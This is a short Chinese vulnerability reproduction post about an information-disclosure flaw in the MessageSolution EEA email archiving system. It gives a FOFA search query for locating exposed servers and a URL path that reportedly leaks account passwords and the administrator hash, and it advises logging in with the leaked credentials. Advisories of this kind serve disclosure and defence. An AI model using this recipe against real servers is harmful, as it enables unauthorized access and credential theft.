文章来源:渗透Xiao白帽
0x01 前言
MessageSolution是企业电子邮件归档软件的开发商。MessageSolution企业邮件归档管理系统EEA存在信息泄露漏洞。攻击者可利用漏洞获取Windows服务器administrator hash与web账号密码等敏感信息。
0x02 漏洞影响
MessageSolution 企业邮件归档管理系统EEA
0x03 漏洞复现
FOFA语句
title="MessageSolution Enterprise Email Archiving (EEA)"
PAYLOAD:
http://ip/authenticationserverservlet/
直接访问如下,会看到泄露的账号密码
利用泄露的账号密码登录系统
验证脚本
0x04 参考链接
https://mp.weixin.qq.com/s/_ieRHX-7nnnWMeflFcNEnQ
推荐文章++++
*CVE-2021-3156:Linux sudo权限提升漏洞复现